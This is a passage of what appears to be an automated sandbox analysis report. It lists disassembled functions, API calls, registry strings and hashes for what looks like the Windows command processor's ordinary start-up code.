                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                      • String ID:
                                                                      • API String ID: 429350006-0
                                                                      • Opcode ID: 4ec8e3ce127d6bf6d3f35f20f6203acc4e4ddf521c912c2f69158c02627748d3
                                                                      • Instruction ID: bfd4695365c18c7591114bf7d286c7eb9f6990f3a3f8784647f27cf5b6226496
                                                                      • Opcode Fuzzy Hash: 4ec8e3ce127d6bf6d3f35f20f6203acc4e4ddf521c912c2f69158c02627748d3
                                                                      • Instruction Fuzzy Hash: B7E092B774112027FA1167293C8CDAF2A9DEBC6662F050025F849D3202DF2C8C0687B3
                                                                      Function 000487CA Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 270memorylibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 487ca-48870 InitializeCriticalSection EnterCriticalSection LeaveCriticalSection SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 4e310 call 4a9d4 call 48b96 call 48273 GetCommandLineW 9 48873-4887c 0->9 9->9 10 4887e-4888a 9->10 11 48b37-48b38 10->11 12 48890-4889f call 51a05 10->12 13 48b3d-48b43 call 478e4 11->13 18 488a5-488db GetCommandLineW call 4f3a0 call 4e3f0 12->18 19 48b2f-48b35 12->19 20 48b44-48b4c call 57d18 13->20 18->19 27 488e1-488e9 18->27 19->13 28 488f0-48903 call 48e9e call 500e9 27->28 29 488eb 27->29 34 48906-4890f 28->34 29->28 34->34 35 48911-48930 call 4a24c 34->35 38 48934-4893d 35->38 39 48932 35->39 40 4893f-48943 38->40 41 489ab-489e1 GetConsoleOutputCP GetCPInfo call 48572 GetProcessHeap HeapAlloc 38->41 39->38 43 48945 40->43 44 48947-48951 40->44 47 489e3-489f1 GetConsoleTitleW 41->47 48 489fd-48a03 41->48 43->44 44->41 46 48953-4895a 44->46 46->41 49 4895c-4895e 46->49 47->48 50 489f3-489fa 47->50 51 48a05-48a0f call 49a11 48->51 52 48a51-48a57 48->52 53 48960 49->53 54 48962-48979 call 478e4 49->54 50->48 51->52 67 48a11-48a1b 51->67 57 48a59-48a8b call 670d6 call 44d08 call 463bd call 49950 52->57 58 48abb-48b08 GetModuleHandleW GetProcAddress * 3 52->58 53->54 68 48980-4898f GetWindowsDirectoryW 54->68 69 4897b 54->69 87 48aa7-48ab0 call 478e4 57->87 88 48a8d-48aa5 call 49950 * 2 57->88 60 48b14-48b16 58->60 61 48b0a-48b0d 58->61 66 48b17-48b28 free call 56b30 60->66 61->60 65 48b0f-48b12 61->65 65->60 65->66 76 48b2d-48b2e 66->76 72 48a4c call 68496 67->72 73 48a1d-48a32 GetStdHandle GetConsoleScreenBufferInfo 67->73 68->20 74 48995-4899d 68->74 69->68 72->52 77 48a34-48a3e 73->77 78 48a40-48a4a 73->78 79 489a4-489a6 call 48bc7 74->79 80 4899f 74->80 77->52 78->52 78->72 79->41 80->79 93 48ab1-48ab5 GlobalFree 87->93 88->93 93->58
                                                                      APIs
                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0007CA04), ref: 000487EE
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000487FA
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0004880E
                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00067460,00000001), ref: 0004881B
                                                                      • _get_osfhandle.MSVCRT ref: 00048828
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00048830
                                                                      • _get_osfhandle.MSVCRT ref: 0004883C
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00048844
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E318
                                                                        • Part of subcall function 0004E310: SetConsoleMode.KERNELBASE(00000000), ref: 0004E322
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E32F
                                                                        • Part of subcall function 0004E310: GetConsoleMode.KERNELBASE(00000000), ref: 0004E339
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E35E
                                                                        • Part of subcall function 0004E310: GetConsoleMode.KERNELBASE(00000000), ref: 0004E368
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E390
                                                                        • Part of subcall function 0004E310: SetConsoleMode.KERNELBASE(00000000), ref: 0004E39A
                                                                        • Part of subcall function 0004A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0004A9C5), ref: 0004A9D8
                                                                        • Part of subcall function 0004A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0004A9F3
                                                                        • Part of subcall function 0004A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0004A9FA
                                                                        • Part of subcall function 0004A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0004AA09
                                                                        • Part of subcall function 0004A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0004AA12
                                                                        • Part of subcall function 00048B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0004885E), ref: 00048B9D
                                                                        • Part of subcall function 00048B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004885E), ref: 00048BA4
                                                                        • Part of subcall function 00048273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000482D3
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00048313
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0004834D
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0004839D
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000483D7
                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0004886A
                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000488A5
                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00048987
                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 000489AB
                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 000489BC
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,0007C9E0,00000008), ref: 0004859E
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000485BC
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00048614
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00048653
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0007C9D0,00000008), ref: 0004867D
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0007C970,00000020), ref: 00048698
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0007C930,00000020), ref: 000486B0
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 000489CD
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 000489D4
                                                                      • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 000489E9
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00048A23
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00048A2A
                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00048AB5
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00048AC0
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00048AD1
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00048AE7
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00048AF8
                                                                      • free.MSVCRT(?), ref: 00048B18
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                      • API String ID: 3313898297-3021193919
                                                                      • Opcode ID: 598ccef90171f724706b7c2b9ba84d1279c7209ab722767ec0e908cf764d9683
                                                                      • Instruction ID: 642859553c6f143bcdd872e065b45fbd03d9a5829e595d6083c7881b80eaf5b5
                                                                      • Opcode Fuzzy Hash: 598ccef90171f724706b7c2b9ba84d1279c7209ab722767ec0e908cf764d9683
                                                                      • Instruction Fuzzy Hash: CE91A7B1B007009FFB14AB64DC1EAAE37A5FB45701B04843AF646DB192DF789C81CB5A
                                                                      Function 00048273 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 309registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 207 48273-482b7 call 57f80 210 482bd-482db RegOpenKeyExW 207->210 211 48540-4854c 210->211 212 482e1-4831b RegQueryValueExW 210->212 211->210 213 48552-48571 time srand call 56b30 211->213 214 5b0f1-5b0f8 212->214 215 48321-48355 RegQueryValueExW 212->215 217 5b10d-5b114 214->217 218 5b0fa-5b108 214->218 219 48357-4835e 215->219 220 48371-483a5 RegQueryValueExW 215->220 217->215 224 5b11a-5b134 _wtol 217->224 218->215 225 48364-4836a 219->225 226 5b139-5b140 219->226 221 5b165-5b16c 220->221 222 483ab-483df RegQueryValueExW 220->222 230 5b181-5b188 221->230 231 5b16e-5b17c 221->231 227 483e1-483e8 222->227 228 483fb-4842f RegQueryValueExW 222->228 224->215 225->220 226->220 229 5b146-5b160 _wtol 226->229 232 5b1ad-5b1b4 227->232 233 483ee-483f5 227->233 234 48431-48438 228->234 235 4846c-484a0 RegQueryValueExW 228->235 229->220 230->222 236 5b18e-5b1a8 _wtol 230->236 231->222 232->228 237 5b1ba-5b1cb wcstol 232->237 233->228 238 5b1d3-5b1da 234->238 239 4843e-4844e 234->239 240 484a6-484ad 235->240 241 5b24c-5b254 235->241 236->222 237->238 242 5b1f5 238->242 243 5b1dc-5b1ed wcstol 238->243 244 48454-4845d 239->244 245 5b200-5b202 239->245 246 484b3-484c3 240->246 247 5b20f-5b216 240->247 248 5b25a-5b25d 241->248 242->245 243->242 249 5b203-5b20a 244->249 250 48463-48466 244->250 245->249 251 5b23c-5b23e 246->251 252 484c9-484d2 246->252 253 5b231 247->253 254 5b218-5b229 wcstol 247->254 256 484f4 248->256 257 5b263-5b269 248->257 249->235 250->235 250->249 255 5b23f-5b241 251->255 252->255 258 484d8-484db 252->258 253->251 254->253 255->241 259 5b26e-5b271 256->259 260 484fa-4852e RegQueryValueExW 256->260 257->260 258->255 261 484e1-484eb 258->261 259->260 264 5b277-5b27e 259->264 262 48534-4853a RegCloseKey 260->262 263 5b283-5b28a 260->263 261->248 265 484f1 261->265 262->211 266 5b28c-5b2b5 ExpandEnvironmentStringsW 263->266 267 5b2d9-5b2e1 263->267 264->260 265->256 269 5b2b7-5b2c8 call 4f3a0 266->269 270 5b2ca-5b2cc 266->270 267->262 268 5b2e7-5b2f4 call 4acb0 267->268 268->262 273 5b2d3 269->273 270->273 273->267
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000482D3
                                                                      • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00048313
                                                                      • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0004834D
                                                                      • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0004839D
                                                                      • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000483D7
                                                                      • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00048427
                                                                      • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00048498
                                                                      • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00048526
                                                                      • RegCloseKey.KERNELBASE(?), ref: 0004853A
                                                                      • time.MSVCRT(00000000), ref: 00048554
                                                                      • srand.MSVCRT ref: 0004855B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                      • API String ID: 145004033-3846321370
                                                                      • Opcode ID: 8314202599f4634bc0a003a5f2b99c9213f80ccaf5690c0fbb665d4a39030609
                                                                      • Instruction ID: eafd05fa1ec3a2e34c5dad08cd1c6c49fb53101c26d8d8e14982430da8b98481
                                                                      • Opcode Fuzzy Hash: 8314202599f4634bc0a003a5f2b99c9213f80ccaf5690c0fbb665d4a39030609
                                                                      • Instruction Fuzzy Hash: 01C18375900299DAEF319B50DD05BDE77B8FB08702F5084E6E689A2190DBF45EC8CF29
                                                                      Function 000509B1 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 276 509b1-50a12 GetCurrentThreadId OpenThread call 4e2af HeapSetInformation RegOpenKeyExW 279 5e9c5-5e9ea RegQueryValueExW RegCloseKey 276->279 280 50a18-50a50 call 51f5b call 51f1a call 487ca 276->280 283 5e9f5-5ea03 call 463bd call 64840 279->283 290 50a55-50a59 280->290 291 5ea08-5ea10 call 51e70 283->291 290->283 292 50a5f-50a66 290->292 301 5ea12 291->301 294 50a6c-50a81 _setjmp3 292->294 295 5ea58-5ea6d _setjmp3 292->295 299 50a87 294->299 300 5ea1c-5ea24 294->300 297 5ea82-5ea85 295->297 298 5ea6f-5ea71 295->298 305 5ea87-5ea95 call 463bd call 64840 297->305 306 5eaaa-5eab3 call 4dd98 297->306 298->297 302 5ea73-5ea7b call 51e70 298->302 303 50a8a-50a8c 299->303 300->303 304 5ea2a-5ea2d 300->304 301->300 322 5ea7d 302->322 309 50ac5-50ac7 303->309 310 50a8e 303->310 304->303 325 5ea9a-5eaa2 call 51e70 305->325 320 5eab5-5eac5 _setmode 306->320 321 5eac6-5eac7 call 562c0 306->321 312 5ea52 309->312 313 50acd-50ad5 call 51e70 309->313 316 50a90-50a96 310->316 312->295 332 50ad7 313->332 323 50ae0-50af1 call 4c570 316->323 324 50a98-50a9c 316->324 320->321 334 5eacc-5eaff EnterCriticalSection LeaveCriticalSection call 4c570 321->334 329 5eb7f 322->329 338 50af7-50afa 323->338 339 5ea41-5ea49 call 51e70 323->339 324->316 330 50a9e-50aba call 4e310 GetConsoleOutputCP GetCPInfo call 4e2af 324->330 344 5eaa4 325->344 348 50abf 330->348 337 50ada exit 332->337 352 5eb01-5eb04 334->352 337->323 345 50b00-50b04 call 4e470 338->345 346 5ea32-5ea3a call 51e70 338->346 355 5ea4b-5ea4d 339->355 344->306 356 50b09-50b0b 345->356 358 5ea3c 346->358 348->309 353 5eb75-5eb7d call 51e70 352->353 354 5eb06-5eb70 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo call 4e2af call 4e470 call 4e310 GetConsoleOutputCP GetCPInfo call 4e2af 352->354 353->329 354->334 355->337 356->324 361 50b0d-50b10 356->361 358->329 361->324
                                                                      APIs
                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000509CB
                                                                      • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 000509D8
                                                                        • Part of subcall function 0004E2AF: SetThreadUILanguage.KERNELBASE ref: 0004E2C6
                                                                      • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 000509ED
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00050A0A
                                                                      • _setjmp3.MSVCRT ref: 00050A72
                                                                      • GetConsoleOutputCP.KERNELBASE ref: 00050AA3
                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 00050AB4
                                                                      • exit.KERNELBASE ref: 00050ADA
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 0005E9E1
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 0005E9EA
                                                                        • Part of subcall function 00051F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,0005EF7C,?,00000000,00000000), ref: 00051FB2
                                                                        • Part of subcall function 00051F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,0005EF7C,?,00000000,00000000), ref: 00051FCE
                                                                        • Part of subcall function 00051F1A: GetConsoleOutputCP.KERNELBASE(00050A41), ref: 00051F1A
                                                                        • Part of subcall function 00051F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 00051F2B
                                                                        • Part of subcall function 00051F1A: memset.MSVCRT ref: 00051F45
                                                                        • Part of subcall function 000487CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0007CA04), ref: 000487EE
                                                                        • Part of subcall function 000487CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000487FA
                                                                        • Part of subcall function 000487CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0004880E
                                                                        • Part of subcall function 000487CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00067460,00000001), ref: 0004881B
                                                                        • Part of subcall function 000487CA: _get_osfhandle.MSVCRT ref: 00048828
                                                                        • Part of subcall function 000487CA: GetConsoleMode.KERNELBASE(00000000), ref: 00048830
                                                                        • Part of subcall function 000487CA: _get_osfhandle.MSVCRT ref: 0004883C
                                                                        • Part of subcall function 000487CA: GetConsoleMode.KERNELBASE(00000000), ref: 00048844
                                                                        • Part of subcall function 000487CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0004886A
                                                                        • Part of subcall function 000487CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000488A5
                                                                      • _setjmp3.MSVCRT ref: 0005EA5E
                                                                      Strings
                                                                      • DisableCMD, xrefs: 0005E9D9
                                                                      • Software\Policies\Microsoft\Windows\System, xrefs: 00050A00
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                      • API String ID: 4238206819-1920437939
                                                                      • Opcode ID: 55a2a4f5d805de5c06b305dfcc3ac876844bef554cd7ef0d1ec89e018ba1083c
                                                                      • Instruction ID: 47a06f5b2accfb9881ded627e26061a24f12acb8c145c3fc3e779320c521ee79
                                                                      • Opcode Fuzzy Hash: 55a2a4f5d805de5c06b305dfcc3ac876844bef554cd7ef0d1ec89e018ba1083c
                                                                      • Instruction Fuzzy Hash: 82711B70A00345AEFB54AF70DC46AAF3BA9FF05342B144439FD46E1192EB39DD488B26
                                                                      Function 000500E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 370 500e9-50140 memset call 4e3f0 373 5e615-5e61d call 51e70 370->373 374 50146-5014b 370->374 380 5e61f-5e621 exit 373->380 375 5e627 374->375 376 50151-5016a GetModuleFileNameW call 4ec2e 374->376 381 5e632-5e63e call 4a976 375->381 376->381 384 50170-5017e call 4ec2e 376->384 380->375 388 5e643-5e64f call 4a976 381->388 384->388 389 50184-50192 call 4ec2e 384->389 394 5e654-5e660 call 4a976 388->394 389->394 395 50198-501a4 call 4ec2e 389->395 400 5e665-5e66a 394->400 395->400 401 501aa-501b6 call 4ec2e 395->401 402 5e672-5e67c call 4a62f 400->402 403 5e66c 400->403 408 5e714-5e724 _wcsicmp 401->408 409 501bc-501c4 401->409 410 5e67e-5e691 _wcsupr 402->410 411 5e6f8-5e6fd 402->411 403->402 408->409 414 5e72a-5e734 408->414 412 501c6-501d8 call 48bc7 409->412 413 501ee-501f3 409->413 415 5e693 410->415 416 5e699 410->416 417 5e705-5e70f call 4a976 411->417 418 5e6ff 411->418 424 501e2-501ed call 56b30 412->424 425 501da-501e1 ??_V@YAXPAX@Z 412->425 413->412 414->409 415->416 420 5e69c-5e6a5 416->420 417->408 418->417 420->420 423 5e6a7-5e6b0 420->423 427 5e6b2-5e6b8 423->427 428 5e6ba-5e6ce call 501f5 423->428 425->424 427->428 433 5e6e1-5e6e3 428->433 434 5e6d0-5e6d2 428->434 435 5e6e5 433->435 436 5e6eb 433->436 437 5e6d4 434->437 438 5e6da-5e6df 434->438 435->436 439 5e6f0-5e6f3 call 4fc40 436->439 437->438 438->439 439->411
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0005011A
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00050156
                                                                        • Part of subcall function 0004EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0006E590,00002000,?,00088BF0,00000000,?,?,00048F0D), ref: 0004EC51
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004EC77
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004EC8D
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECA3
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECB9
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECCF
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECE5
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECF7
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ED0D
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 000501DB
                                                                      • exit.MSVCRT ref: 0005E621
                                                                      • _wcsupr.MSVCRT ref: 0005E683
                                                                      • _wcsicmp.MSVCRT ref: 0005E71A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                      • API String ID: 2336066422-4197029667
                                                                      • Opcode ID: b03e8e1acbbf718630f579a765bf0898ae0254333e036cf6849e43941284ce79
                                                                      • Instruction ID: 5e7f2718487f2761418dffbf5f7fa812a25066cdaf41113a1367b4040b565d5f
                                                                      • Opcode Fuzzy Hash: b03e8e1acbbf718630f579a765bf0898ae0254333e036cf6849e43941284ce79
                                                                      • Instruction Fuzzy Hash: C75105B4B002568BEF289B60CC956FF73A5EF50385F044479ED42A7181EF349F49879A
                                                                      Function 00048BC7 Relevance: 24.3, APIs: 16, Instructions: 312COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
